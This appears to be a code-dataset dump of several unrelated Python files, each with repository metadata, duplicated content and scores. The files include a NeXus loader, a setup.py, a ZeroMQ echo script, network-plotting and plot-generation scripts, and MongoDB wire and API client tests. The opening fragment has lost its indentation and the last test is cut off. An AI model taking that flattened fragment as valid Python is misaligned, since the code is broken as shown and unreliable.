def depends_on(self) -> Union[sc.Variable, sc.DataArray, None]:
if (depends_on := self.get('depends_on')) is not None:
# Imported late to avoid cyclic import
from .nxtransformations import get_full_transformation
return get_full_transformation(depends_on)
return None
def __repr__(self) -> str:
return f'<{type(self).__name__} "{self._group.name}">'
def create_field(self, name: str, data: DimensionedArray, **kwargs) -> Field:
values = data.values
if data.dtype == sc.DType.string:
values = np.array(data.values, dtype=object)
elif data.dtype == sc.DType.datetime64:
start = sc.epoch(unit=data.unit)
values = (data - start).values
dataset = self._group.create_dataset(name, data=values, **kwargs)
if data.unit is not None:
dataset.attrs['units'] = str(data.unit)
if data.dtype == sc.DType.datetime64:
dataset.attrs['start'] = str(start.value)
return Field(dataset, data.dims)
def create_class(self, name: str, nx_class: NX_class) -> NXobject:
group = self._group.create_group(name)
group.attrs['NX_class'] = nx_class.name
return _make(group)
def __setitem__(self, name: str, value: Union[Field, NXobject, DimensionedArray]):
"""Create a link or a new field."""
if isinstance(value, Field):
self._group[name] = value._dataset
elif isinstance(value, NXobject):
self._group[name] = value._group
else:
self.create_field(name, value)
class NXroot(NXobject):
"""Root of a NeXus file."""
@property
def nx_class(self) -> NX_class:
# As an oversight in the NeXus standard and the reference implementation,
# the NX_class was never set to NXroot. This applies to essentially all
# files in existence before 2016, and files written by other implementations
# that were inspired by the reference implementation. We thus hardcode NXroot:
return NX_class['NXroot']
class NXentry(NXobject):
"""Entry in a NeXus file."""
class NXinstrument(NXobject):
"""Group of instrument-related information."""
class NXtransformations(NXobject):
"""Group of transformations."""
def _make(group) -> NXobject:
if (nx_class := Attrs(group.attrs).get('NX_class')) is not None:
return _nx_class_registry().get(nx_class, NXobject)(group)
return group # Return underlying (h5py) group
@functools.lru_cache()
def _nx_class_registry():
from .nxevent_data import NXevent_data
from .nxdata import NXdata
from .nxdetector import NXdetector
from .nxdisk_chopper import NXdisk_chopper
from .nxlog import NXlog
from .nxmonitor import NXmonitor
from .nxsample import NXsample
from .nxsource import NXsource
return {
cls.__name__: cls
for cls in [
NXroot, NXentry, NXevent_data, NXlog, NXmonitor, NXdata, NXdetector,
NXsample, NXsource, NXdisk_chopper, NXinstrument, NXtransformations
]
}
| en | 0.846349 | # SPDX-License-Identifier: BSD-3-Clause # Copyright (c) 2022 Scipp contributors (https://github.com/scipp) # @author <NAME> # TODO move into scipp A multi-dimensional array with a unit and dimension labels. Could be, e.g., a scipp.Variable or a dimple dataclass wrapping a numpy array. Multi-dimensional array of values Physical unit of the values Dimension labels for the values Get attribute Invalid or unsupported class and field structure in Nexus. HDF5 attributes. # Is this check for string attributes sufficient? Is there a better way? # NumPy and scipp cannot handle timezone information. We therefore apply it, # i.e., convert to UTC. # Would like to use dateutil directly, but with Python's datetime we do not # get nanosecond precision. Therefore we combine numpy and dateutil parsing. # No timezone, parse directly (scipp based on numpy) # There is timezone info. Parse with dateutil. # handled by numpy # We operate with string operations here and thus end up parsing date # and time twice. The reason is that the timezone-offset arithmetic # cannot be done, e.g., in nanoseconds without causing rounding errors. NeXus field. In HDF5 fields are represented as dataset. # NeXus treats [] and [1] interchangeably. In general this is ill-defined, but # the best we can do appears to be squeezing unless the file provides names for # dimensions. The shape property of this class does thus not necessarily return # the same as the shape of the underlying dataset. # The convention here is that the given dimensions apply to the shapes # starting from the left. So we only squeeze dimensions that are after # len(dims). # If the variable is empty, return early # On versions of h5py prior to 3.2, a TypeError occurs in some cases # where h5py cannot broadcast data with e.g. shape (20, 1) to a buffer # of shape (20,). Note that broadcasting (1, 20) -> (20,) does work # (see https://github.com/h5py/h5py/pull/1796). # Therefore, we manually squeeze here. 
# A pin of h5py<3.2 is currently required by Mantid and hence scippneutron # (see https://github.com/h5py/h5py/issues/1880#issuecomment-823223154) # hence this workaround. Once we can use a more recent h5py with Mantid, # this try/except can be removed. Total number of dimensions in the dataset. See the shape property for potential differences to the value returned by the underlying h5py.Dataset.ndim. Shape of the field. NeXus may use extra dimensions of length one to store data, such as shape=[1] instead of shape=[]. This property returns the *squeezed* shape, dropping all length-1 dimensions that are not explicitly named. The returned shape may thus be different from the shape of the underlying h5py.Dataset. Base class for all NeXus groups. Get item, with flag to control whether fields dims should be inferred Subclasses should reimplement this to provide dimension labels for fields. # TODO implement visititems for NXobject and merge the two blocks # fall back to full path if duplicate The value of the NX_class attribute of the group. In case of the subclass NXroot this returns 'NXroot' even if the attribute is not actually set. This is to support the majority of all legacy files, which do not have this attribute. # Imported late to avoid cyclic import Create a link or a new field. Root of a NeXus file. # As an oversight in the NeXus standard and the reference implementation, # the NX_class was never set to NXroot. This applies to essentially all # files in existence before 2016, and files written by other implementations # that were inspired by the reference implementation. We thus hardcode NXroot: Entry in a NeXus file. Group of instrument-related information. Group of transformations. # Return underlying (h5py) group | 2.320209 | 2 |
setup.py | erkolson/mergeyaml | 0 | 6623859 | from setuptools import setup
from meta import __version__
setup(
name='mergeyaml',
version=__version__,
author="<NAME>",
py_modules=['mergeyaml'],
license="MIT",
install_requires=[
"click==6.7",
"PyYAML==3.12",
"oyaml>=0.4",
],
entry_points='''
[console_scripts]
mergeyaml=mergeyaml:cli
''',
)
| from setuptools import setup
from meta import __version__
setup(
name='mergeyaml',
version=__version__,
author="<NAME>",
py_modules=['mergeyaml'],
license="MIT",
install_requires=[
"click==6.7",
"PyYAML==3.12",
"oyaml>=0.4",
],
entry_points='''
[console_scripts]
mergeyaml=mergeyaml:cli
''',
)
| en | 0.521803 | [console_scripts] mergeyaml=mergeyaml:cli | 1.139949 | 1 |
example/zmq_echo.py | tejeez/suo | 2 | 6623860 | <reponame>tejeez/suo<gh_stars>1-10
#!/usr/bin/env python3
# Example to parse frame metadata and transmit the same data back
# with an incremented timestamp.
import zmq, threading, struct
ctx = zmq.Context()
rx = ctx.socket(zmq.SUB)
rx.connect("tcp://localhost:43300")
rx.setsockopt(zmq.SUBSCRIBE, b"")
tx = ctx.socket(zmq.PUB)
tx.connect("tcp://localhost:43301")
def hard_decision(data):
return bytes([ v >= 0x80 for v in data ])
while True:
rxframe = rx.recv()
metadata = struct.unpack('IIQIffffffffffI', rxframe[0:64])
rx_data = rxframe[64:]
rx_timestamp = metadata[2]
#print(rx_timestamp, rx_data)
tx_data = hard_decision(rx_data[12:484])
tx_timestamp = rx_timestamp + 10000000000
#print(tx_timestamp, tx_data)
print(tx_timestamp, ' '.join(['o1'[tx_data[i]] + 'o1'[tx_data[i+1]] for i in range(0, len(tx_data), 2)]))
tx.send(struct.pack('IIQIffffffffffI', 0, 4, tx_timestamp, 0, 0,0,0,0, 0,0,0,0,0,0, len(tx_data)) + tx_data)
| #!/usr/bin/env python3
# Example to parse frame metadata and transmit the same data back
# with an incremented timestamp.
import zmq, threading, struct
ctx = zmq.Context()
rx = ctx.socket(zmq.SUB)
rx.connect("tcp://localhost:43300")
rx.setsockopt(zmq.SUBSCRIBE, b"")
tx = ctx.socket(zmq.PUB)
tx.connect("tcp://localhost:43301")
def hard_decision(data):
return bytes([ v >= 0x80 for v in data ])
while True:
rxframe = rx.recv()
metadata = struct.unpack('IIQIffffffffffI', rxframe[0:64])
rx_data = rxframe[64:]
rx_timestamp = metadata[2]
#print(rx_timestamp, rx_data)
tx_data = hard_decision(rx_data[12:484])
tx_timestamp = rx_timestamp + 10000000000
#print(tx_timestamp, tx_data)
print(tx_timestamp, ' '.join(['o1'[tx_data[i]] + 'o1'[tx_data[i+1]] for i in range(0, len(tx_data), 2)]))
tx.send(struct.pack('IIQIffffffffffI', 0, 4, tx_timestamp, 0, 0,0,0,0, 0,0,0,0,0,0, len(tx_data)) + tx_data) | en | 0.351737 | #!/usr/bin/env python3 # Example to parse frame metadata and transmit the same data back # with an incremented timestamp. #print(rx_timestamp, rx_data) #print(tx_timestamp, tx_data) | 2.396214 | 2 |
examples/example_multiplex_dynamics.py | SkBlaz/supertest | 79 | 6623861 | # visualize multiplex network dynamics
from py3plex.visualization.multilayer import draw_multilayer_default
from py3plex.core import multinet
from collections import defaultdict
import matplotlib.pyplot as plt
import seaborn as sns
# first parse the layer n1 n2 w edgelist
multilayer_network = multinet.multi_layer_network().load_network(
"../multilayer_datasets/MLKing/MLKing2013_multiplex.edges",
directed=True,
input_type="multiplex_edges")
# map layer ids to names
multilayer_network.load_layer_name_mapping(
"../multilayer_datasets/MLKing/MLKing2013_layers.txt")
# Finally, load termporal edge information
multilayer_network.load_network_activity(
"../multilayer_datasets/MLKing/MLKing2013_activity.txt")
# read correctly?
multilayer_network.basic_stats()
layout_parameters = {"iterations": 1}
# internally split to layers
multilayer_network.split_to_layers(style="diagonal",
compute_layouts="force",
layout_parameters=layout_parameters,
multiplex=True)
# remove all internal networks' edges.
multilayer_network.remove_layer_edges(
) # empty graphs are stored as self.empty_layers
# do the time series splits
n = 1000 # chunk row size
partial_slices = [
multilayer_network.activity[i:i + n]
for i in range(0, multilayer_network.activity.shape[0], n)
]
num_edges = defaultdict(list)
for enx, time_slice in enumerate(partial_slices):
if enx < 12:
plt.subplot(4, 3, enx + 1)
plt.title("Time slice: {}".format(enx + 1))
num_edges_int = dict()
for enx, row in time_slice.iterrows():
real_name = multilayer_network.real_layer_names[int(row.layer_name)
- 1]
if real_name not in num_edges_int:
num_edges_int[real_name] = 1
else:
num_edges_int[real_name] += 1
for k, v in num_edges_int.items():
num_edges[k].append(v)
multilayer_network.fill_tmp_with_edges(time_slice)
draw_multilayer_default(multilayer_network.tmp_layers,
labels=multilayer_network.real_layer_names,
display=False,
background_shape="circle",
axis=None,
remove_isolated_nodes=True,
node_size=0.1,
edge_size=0.01)
multilayer_network.remove_layer_edges() # clean the slice edges
plt.show()
# plt.savefig("../images/temporal.png",dpi=300)
sns.set_style("whitegrid")
clx = {"RT": "red", "MT": "green", "RE": "blue"}
plt.subplot(1, 1, 1)
plt.title("Temporal edge dynamics")
slices = []
for k, v in num_edges.items():
sns.lineplot(list(range(len(v))), v, label=k, color=clx[k])
plt.legend()
plt.xlabel("Time slice")
plt.ylabel("Number of edges")
plt.show()
| # visualize multiplex network dynamics
from py3plex.visualization.multilayer import draw_multilayer_default
from py3plex.core import multinet
from collections import defaultdict
import matplotlib.pyplot as plt
import seaborn as sns
# first parse the layer n1 n2 w edgelist
multilayer_network = multinet.multi_layer_network().load_network(
"../multilayer_datasets/MLKing/MLKing2013_multiplex.edges",
directed=True,
input_type="multiplex_edges")
# map layer ids to names
multilayer_network.load_layer_name_mapping(
"../multilayer_datasets/MLKing/MLKing2013_layers.txt")
# Finally, load termporal edge information
multilayer_network.load_network_activity(
"../multilayer_datasets/MLKing/MLKing2013_activity.txt")
# read correctly?
multilayer_network.basic_stats()
layout_parameters = {"iterations": 1}
# internally split to layers
multilayer_network.split_to_layers(style="diagonal",
compute_layouts="force",
layout_parameters=layout_parameters,
multiplex=True)
# remove all internal networks' edges.
multilayer_network.remove_layer_edges(
) # empty graphs are stored as self.empty_layers
# do the time series splits
n = 1000 # chunk row size
partial_slices = [
multilayer_network.activity[i:i + n]
for i in range(0, multilayer_network.activity.shape[0], n)
]
num_edges = defaultdict(list)
for enx, time_slice in enumerate(partial_slices):
if enx < 12:
plt.subplot(4, 3, enx + 1)
plt.title("Time slice: {}".format(enx + 1))
num_edges_int = dict()
for enx, row in time_slice.iterrows():
real_name = multilayer_network.real_layer_names[int(row.layer_name)
- 1]
if real_name not in num_edges_int:
num_edges_int[real_name] = 1
else:
num_edges_int[real_name] += 1
for k, v in num_edges_int.items():
num_edges[k].append(v)
multilayer_network.fill_tmp_with_edges(time_slice)
draw_multilayer_default(multilayer_network.tmp_layers,
labels=multilayer_network.real_layer_names,
display=False,
background_shape="circle",
axis=None,
remove_isolated_nodes=True,
node_size=0.1,
edge_size=0.01)
multilayer_network.remove_layer_edges() # clean the slice edges
plt.show()
# plt.savefig("../images/temporal.png",dpi=300)
sns.set_style("whitegrid")
clx = {"RT": "red", "MT": "green", "RE": "blue"}
plt.subplot(1, 1, 1)
plt.title("Temporal edge dynamics")
slices = []
for k, v in num_edges.items():
sns.lineplot(list(range(len(v))), v, label=k, color=clx[k])
plt.legend()
plt.xlabel("Time slice")
plt.ylabel("Number of edges")
plt.show()
| en | 0.553372 | # visualize multiplex network dynamics # first parse the layer n1 n2 w edgelist # map layer ids to names # Finally, load termporal edge information # read correctly? # internally split to layers # remove all internal networks' edges. # empty graphs are stored as self.empty_layers # do the time series splits # chunk row size # clean the slice edges # plt.savefig("../images/temporal.png",dpi=300) | 2.747354 | 3 |
distpy/workers/plotgenerator.py | billmcchesney1/distpy | 23 | 6623862 | # (C) 2020, Schlumberger. Refer to LICENSE
import numpy
import matplotlib.pyplot as plt
import datetime
import scipy.signal
import os
import distpy.io_help.io_helpers as io_helpers
import distpy.io_help.directory_services as directory_services
import distpy.calc.extra_numpy as extra_numpy
import distpy.calc.extra_pyplot as extra_pyplot
import distpy.calc.unit_handler as unit_handler
import distpy.calc.pub_command_set as pub_command_set
import distpy.calc.processing_commands as processing_commands
'''
read_zones : read a CSV file containing measured_depth zone information
for plot annotation
'''
def read_zones(csvFile):
lines = directory_services.csv_reader(csvFile)
#conversion = 1.0
#if (lines[1][0]=="ft"):
# conversion = FT_TO_M
zones=[]
for a in range(2, len(lines),2):
one_zone={}
tokens = lines[a]
one_zone['start'] = float(tokens[0])
one_zone['name'] = tokens[-1]
tokens = lines[a+1]
one_zone['end'] = float(tokens[0])
zones.append(one_zone)
print(len(zones))
return zones
'''
plotgenerator : generates a command_list which is then executed to generate the
plots.
'''
def plotgenerator(dirin, dirout, plotData):
# Configure the hardware
boxsize = plotData.get('BOXSIZE', 500)
extra_numpy.set_boxsize(boxsize)
depth_display_unit = plotData['depth_display_unit']
start_of_fibre = plotData['start_of_fibre']
end_of_fibre = plotData['end_of_fibre']
figure_size = plotData['figure_size']
dots_per_inch = plotData['dpi']
event_list = plotData['label_list']
## clusters and stages
segs_blob = plotData['well_segments']
# blob locations
TIME_REF_BLOB = directory_services.path_join(dirin,plotData['time_reference'])
DEPTH_REF_BLOB = directory_services.path_join(dirin,plotData['depth_reference'])
time_ref = directory_services.load(TIME_REF_BLOB)
time_list = extra_pyplot.time_stamps(time_ref)
nt = time_ref.shape[0]
depth_ref = directory_services.load(DEPTH_REF_BLOB)
if (depth_display_unit=="ft"):
depth_ref = unit_handler.M_TO_FT(depth_ref)
nx = depth_ref.shape[0]
# well segmentation for flow allocations
well_segs = read_zones(segs_blob)
# same command factory as for strain-rate processing - giving maths functions...
#dir_suffix = plotData.get('directory_out',dirout)
#if not dir_suffix=='NONE':
# dirval = os.path.join(dirout,dir_suffix)
dirval = dirout
directory_services.makedir(dirval)
plt.switch_backend('Agg')
command_list = []
# small 2D array for a command zero
data=numpy.zeros((10,10),dtype=numpy.double)
command_list.append(pub_command_set.DataLoadCommand(data,{}))
for plot in plotData['plots']:
# Locally package the global information for the generation of this particular plot
plot['nx']=nx
plot['nt']=nt
plot['label_list']= plotData['label_list']
plot['time_ref']=time_ref
plot['depth_ref']=depth_ref
plot['directory_in']=dirin
plot['depth_display_unit'] = plotData['depth_display_unit']
plot['start_of_fibre'] = plotData['start_of_fibre']
plot['end_of_fibre'] = plotData['end_of_fibre']
plot['figure_size'] = plotData['figure_size']
plot['dpi'] = plotData['dpi']
plot['well_segments'] = well_segs
# internal mapping to the commands
# 1. commands have names
# 2. in_uid from a previous command (here always command zero)
plot['name'] = plot['plot_type']
plot['in_uid']=0
plot['directory_out']=dirval
command_list.append(processing_commands.CommandFactory(command_list,plot))
# Actual plot generation occurs here...
for command in command_list:
print(command)
command.execute()
| # (C) 2020, Schlumberger. Refer to LICENSE
import numpy
import matplotlib.pyplot as plt
import datetime
import scipy.signal
import os
import distpy.io_help.io_helpers as io_helpers
import distpy.io_help.directory_services as directory_services
import distpy.calc.extra_numpy as extra_numpy
import distpy.calc.extra_pyplot as extra_pyplot
import distpy.calc.unit_handler as unit_handler
import distpy.calc.pub_command_set as pub_command_set
import distpy.calc.processing_commands as processing_commands
'''
read_zones : read a CSV file containing measured_depth zone information
for plot annotation
'''
def read_zones(csvFile):
lines = directory_services.csv_reader(csvFile)
#conversion = 1.0
#if (lines[1][0]=="ft"):
# conversion = FT_TO_M
zones=[]
for a in range(2, len(lines),2):
one_zone={}
tokens = lines[a]
one_zone['start'] = float(tokens[0])
one_zone['name'] = tokens[-1]
tokens = lines[a+1]
one_zone['end'] = float(tokens[0])
zones.append(one_zone)
print(len(zones))
return zones
'''
plotgenerator : generates a command_list which is then executed to generate the
plots.
'''
def plotgenerator(dirin, dirout, plotData):
# Configure the hardware
boxsize = plotData.get('BOXSIZE', 500)
extra_numpy.set_boxsize(boxsize)
depth_display_unit = plotData['depth_display_unit']
start_of_fibre = plotData['start_of_fibre']
end_of_fibre = plotData['end_of_fibre']
figure_size = plotData['figure_size']
dots_per_inch = plotData['dpi']
event_list = plotData['label_list']
## clusters and stages
segs_blob = plotData['well_segments']
# blob locations
TIME_REF_BLOB = directory_services.path_join(dirin,plotData['time_reference'])
DEPTH_REF_BLOB = directory_services.path_join(dirin,plotData['depth_reference'])
time_ref = directory_services.load(TIME_REF_BLOB)
time_list = extra_pyplot.time_stamps(time_ref)
nt = time_ref.shape[0]
depth_ref = directory_services.load(DEPTH_REF_BLOB)
if (depth_display_unit=="ft"):
depth_ref = unit_handler.M_TO_FT(depth_ref)
nx = depth_ref.shape[0]
# well segmentation for flow allocations
well_segs = read_zones(segs_blob)
# same command factory as for strain-rate processing - giving maths functions...
#dir_suffix = plotData.get('directory_out',dirout)
#if not dir_suffix=='NONE':
# dirval = os.path.join(dirout,dir_suffix)
dirval = dirout
directory_services.makedir(dirval)
plt.switch_backend('Agg')
command_list = []
# small 2D array for a command zero
data=numpy.zeros((10,10),dtype=numpy.double)
command_list.append(pub_command_set.DataLoadCommand(data,{}))
for plot in plotData['plots']:
# Locally package the global information for the generation of this particular plot
plot['nx']=nx
plot['nt']=nt
plot['label_list']= plotData['label_list']
plot['time_ref']=time_ref
plot['depth_ref']=depth_ref
plot['directory_in']=dirin
plot['depth_display_unit'] = plotData['depth_display_unit']
plot['start_of_fibre'] = plotData['start_of_fibre']
plot['end_of_fibre'] = plotData['end_of_fibre']
plot['figure_size'] = plotData['figure_size']
plot['dpi'] = plotData['dpi']
plot['well_segments'] = well_segs
# internal mapping to the commands
# 1. commands have names
# 2. in_uid from a previous command (here always command zero)
plot['name'] = plot['plot_type']
plot['in_uid']=0
plot['directory_out']=dirval
command_list.append(processing_commands.CommandFactory(command_list,plot))
# Actual plot generation occurs here...
for command in command_list:
print(command)
command.execute()
| en | 0.740487 | # (C) 2020, Schlumberger. Refer to LICENSE read_zones : read a CSV file containing measured_depth zone information for plot annotation #conversion = 1.0 #if (lines[1][0]=="ft"): # conversion = FT_TO_M plotgenerator : generates a command_list which is then executed to generate the plots. # Configure the hardware ## clusters and stages # blob locations # well segmentation for flow allocations # same command factory as for strain-rate processing - giving maths functions... #dir_suffix = plotData.get('directory_out',dirout) #if not dir_suffix=='NONE': # dirval = os.path.join(dirout,dir_suffix) # small 2D array for a command zero # Locally package the global information for the generation of this particular plot # internal mapping to the commands # 1. commands have names # 2. in_uid from a previous command (here always command zero) # Actual plot generation occurs here... | 2.381347 | 2 |
0 install.py | MateP/ocijeni | 0 | 6623863 | #!/usr/bin/env python3
import sys, subprocess, traceback
import tkinter as tk
from tkinter import messagebox
try:
subprocess.check_call([sys.executable, '-m', 'pip', 'install', '-U', 'pip'])
for package in ['img2pdf', 'openpyxl']:
subprocess.check_call([sys.executable, '-m', 'pip', 'install', '-U', package])
root = tk.Tk()
root.withdraw()
messagebox.showinfo('Uspjeh!', 'Instalacija je uspješno privedena kraju.')
root.destroy()
except Exception as e:
root = tk.Tk()
root.withdraw()
with open('error_log.txt','w') as f:
f.write(f'{e}\n'+''.join(traceback.format_tb(e.__traceback__)))
messagebox.showerror('Kritična greška!', f'Instalacija nije dovršena do kraja.\n\nError: {e}')
root.destroy()
raise e
# Treba imati instaliran Python3 s opcijom ADD TO PATH!
| #!/usr/bin/env python3
import sys, subprocess, traceback
import tkinter as tk
from tkinter import messagebox
try:
subprocess.check_call([sys.executable, '-m', 'pip', 'install', '-U', 'pip'])
for package in ['img2pdf', 'openpyxl']:
subprocess.check_call([sys.executable, '-m', 'pip', 'install', '-U', package])
root = tk.Tk()
root.withdraw()
messagebox.showinfo('Uspjeh!', 'Instalacija je uspješno privedena kraju.')
root.destroy()
except Exception as e:
root = tk.Tk()
root.withdraw()
with open('error_log.txt','w') as f:
f.write(f'{e}\n'+''.join(traceback.format_tb(e.__traceback__)))
messagebox.showerror('Kritična greška!', f'Instalacija nije dovršena do kraja.\n\nError: {e}')
root.destroy()
raise e
# Treba imati instaliran Python3 s opcijom ADD TO PATH!
| sr | 0.208439 | #!/usr/bin/env python3 # Treba imati instaliran Python3 s opcijom ADD TO PATH! | 2.271868 | 2 |
test/test_wire.py | SamP20/mongo-sio | 0 | 6623864 | import pytest
import mongo_sio
from mongo_sio import parse_header, parse_op_msg, parse_op_reply, OP_COMPRESSED, OP_MSG, COMPRESSOR_ZLIB, COMPRESSOR_NOOP, COMPRESSOR_SNAPPY
import zlib
import struct
import bson
samples = [
bytes([8, 0, 0, 0, 1, 2, 3, 4]),
bytes([9, 0, 0, 0, 5, 6, 7, 8, 9]),
bytes([12, 0, 0, 0, 10, 11, 12, 13, 14, 15, 16, 17]),
bytes([6, 0, 0, 0, 18, 19])
]
@pytest.mark.parametrize("data",[range(256), 128])
@pytest.mark.parametrize("compressor", mongo_sio.SUPPORTED_COMPRESSORS)
def test_compressed_header_zlib(data, compressor):
body = bytes(data)
if compressor == COMPRESSOR_ZLIB:
body_compressed = zlib.compress(body)
elif compressor == COMPRESSOR_SNAPPY:
# pylint: disable=import-error
import snappy
body_compressed = snappy.compress(body)
elif compressor == COMPRESSOR_NOOP:
body_compressed = body
packed = struct.pack(f"<IIIIIB{len(body_compressed)}s",
345,
567,
OP_COMPRESSED,
OP_MSG,
len(body),
compressor,
body_compressed
)
request_id, response_to, op_code, parsed_data, offset = parse_header(packed)
assert request_id == 345
assert response_to == 567
assert op_code == OP_MSG
assert parsed_data[offset:] == body
def test_parse_op_msg():
header_doc = {
"insert": "test",
"$db": "mydb",
"writeConcern": {"w": "majority" }
}
header_bytes = bson.dumps(header_doc)
body0_ident = b"documents\x00"
body0_doc = {"_id": "Document#1", "myvar": 42}
body0_bytes = bson.dumps(body0_doc)
flagbits = 0x02.to_bytes(4, byteorder="little", signed=False) #MoreToCome bit
bodysize = (len(body0_ident) + len(body0_bytes) + 4).to_bytes(4, byteorder="little", signed=False)
packet = flagbits + b"\x00" + header_bytes + b"\x01" + bodysize + body0_ident + body0_bytes
out_flagbits, out_header_doc, out_sections = parse_op_msg(packet)
assert header_doc == out_header_doc
assert {b"documents": [body0_doc]} == out_sections
assert out_flagbits == 0x02
def test_parse_op_reply():
document = {
"A": "b",
"B": 42,
"C": {"hello": False}
}
flags = 0x55aaff00
cursor_id = 0x7799aabb_ccddeeff
starting_from = 0x11223344
num_returned = 1
doc_bytes = bson.dumps(document)
data = struct.pack(f"<iqii{len(doc_bytes)}s", flags, cursor_id, starting_from, num_returned, doc_bytes)
out_flags, out_cursor_id, out_starting_from, out_docs = parse_op_reply(data)
assert out_flags == flags
assert out_cursor_id == cursor_id
assert out_starting_from == starting_from
assert len(out_docs) == 1
assert out_docs[0] == document
| import pytest
import mongo_sio
from mongo_sio import parse_header, parse_op_msg, parse_op_reply, OP_COMPRESSED, OP_MSG, COMPRESSOR_ZLIB, COMPRESSOR_NOOP, COMPRESSOR_SNAPPY
import zlib
import struct
import bson
samples = [
bytes([8, 0, 0, 0, 1, 2, 3, 4]),
bytes([9, 0, 0, 0, 5, 6, 7, 8, 9]),
bytes([12, 0, 0, 0, 10, 11, 12, 13, 14, 15, 16, 17]),
bytes([6, 0, 0, 0, 18, 19])
]
@pytest.mark.parametrize("data",[range(256), 128])
@pytest.mark.parametrize("compressor", mongo_sio.SUPPORTED_COMPRESSORS)
def test_compressed_header_zlib(data, compressor):
body = bytes(data)
if compressor == COMPRESSOR_ZLIB:
body_compressed = zlib.compress(body)
elif compressor == COMPRESSOR_SNAPPY:
# pylint: disable=import-error
import snappy
body_compressed = snappy.compress(body)
elif compressor == COMPRESSOR_NOOP:
body_compressed = body
packed = struct.pack(f"<IIIIIB{len(body_compressed)}s",
345,
567,
OP_COMPRESSED,
OP_MSG,
len(body),
compressor,
body_compressed
)
request_id, response_to, op_code, parsed_data, offset = parse_header(packed)
assert request_id == 345
assert response_to == 567
assert op_code == OP_MSG
assert parsed_data[offset:] == body
def test_parse_op_msg():
header_doc = {
"insert": "test",
"$db": "mydb",
"writeConcern": {"w": "majority" }
}
header_bytes = bson.dumps(header_doc)
body0_ident = b"documents\x00"
body0_doc = {"_id": "Document#1", "myvar": 42}
body0_bytes = bson.dumps(body0_doc)
flagbits = 0x02.to_bytes(4, byteorder="little", signed=False) #MoreToCome bit
bodysize = (len(body0_ident) + len(body0_bytes) + 4).to_bytes(4, byteorder="little", signed=False)
packet = flagbits + b"\x00" + header_bytes + b"\x01" + bodysize + body0_ident + body0_bytes
out_flagbits, out_header_doc, out_sections = parse_op_msg(packet)
assert header_doc == out_header_doc
assert {b"documents": [body0_doc]} == out_sections
assert out_flagbits == 0x02
def test_parse_op_reply():
document = {
"A": "b",
"B": 42,
"C": {"hello": False}
}
flags = 0x55aaff00
cursor_id = 0x7799aabb_ccddeeff
starting_from = 0x11223344
num_returned = 1
doc_bytes = bson.dumps(document)
data = struct.pack(f"<iqii{len(doc_bytes)}s", flags, cursor_id, starting_from, num_returned, doc_bytes)
out_flags, out_cursor_id, out_starting_from, out_docs = parse_op_reply(data)
assert out_flags == flags
assert out_cursor_id == cursor_id
assert out_starting_from == starting_from
assert len(out_docs) == 1
assert out_docs[0] == document
| en | 0.617448 | # pylint: disable=import-error #1", "myvar": 42} #MoreToCome bit | 2.01296 | 2 |
tests/test_endpoints_canonical.py | soccermetrics/soccermetrics-client-py | 43 | 6623865 | import unittest
import mock
from soccermetrics.rest import SoccermetricsRestClient
@mock.patch('soccermetrics.rest.resources.base.EasyDict')
@mock.patch('soccermetrics.rest.resources.base.Response')
@mock.patch('soccermetrics.rest.resources.base.requests')
class ClientCanonicalEndpointTest(unittest.TestCase):
"""
Test canonical endpoints of API resources in client.
"""
def setUp(self):
self.client = SoccermetricsRestClient(base_uri="https://foo.uri", account="ID", api_key="KEY")
def create_patch(self, name):
patcher = mock.patch(name)
thing = patcher.start()
self.addCleanup(patcher.stop)
return thing
def test_validation_endpoints_integer_id_get(self, mock_resp, resp_obj, mock_dict):
"""Verify URI of Validation resources with integer UIDs passed to GET."""
mock_resp.get.return_value.status_code = 200
value = self.client.validation.phases.get(2)
mock_resp.get.assert_called_with('https://foo.uri/v1/phases/2',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.validation.groupRounds.get(20)
mock_resp.get.assert_called_with('https://foo.uri/v1/grouprounds/20',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.validation.knockoutRounds.get(20)
mock_resp.get.assert_called_with('https://foo.uri/v1/knockoutrounds/20',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.validation.confederations.get(10)
mock_resp.get.assert_called_with('https://foo.uri/v1/confederations/10',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.validation.seasons.get(200)
mock_resp.get.assert_called_with('https://foo.uri/v1/seasons/200',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.validation.timezones.get(20)
mock_resp.get.assert_called_with('https://foo.uri/v1/timezones/20',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.validation.nameOrder.get(2)
mock_resp.get.assert_called_with('https://foo.uri/v1/name_order/2',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.validation.positions.get(20)
mock_resp.get.assert_called_with('https://foo.uri/v1/positions/20',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.validation.fouls.get(20)
mock_resp.get.assert_called_with('https://foo.uri/v1/fouls/20',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.validation.cards.get(2)
mock_resp.get.assert_called_with('https://foo.uri/v1/cards/2',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.validation.bodyparts.get(2)
mock_resp.get.assert_called_with('https://foo.uri/v1/bodyparts/2',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.validation.shotevents.get(20)
mock_resp.get.assert_called_with('https://foo.uri/v1/shotevents/20',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.validation.penaltyOutcomes.get(2)
mock_resp.get.assert_called_with('https://foo.uri/v1/penalty_outcomes/2',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.validation.actions.get(200)
mock_resp.get.assert_called_with('https://foo.uri/v1/actions/200',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.validation.modifiers.get(200)
mock_resp.get.assert_called_with('https://foo.uri/v1/modifiers/200',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.validation.modifierCategories.get(20)
mock_resp.get.assert_called_with('https://foo.uri/v1/modifier_categories/20',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.validation.weather.get(20)
mock_resp.get.assert_called_with('https://foo.uri/v1/weather/20',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.validation.surfaces.get(20)
mock_resp.get.assert_called_with('https://foo.uri/v1/surfaces/20',
params={'app_id': 'ID', 'app_key': 'KEY'})
def test_validation_endpoints_uuid_get(self, mock_resp, resp_obj, mock_dict):
"""Verify URI of Validation resources with UUIDs passed to GET."""
mock_resp.get.return_value.status_code = 200
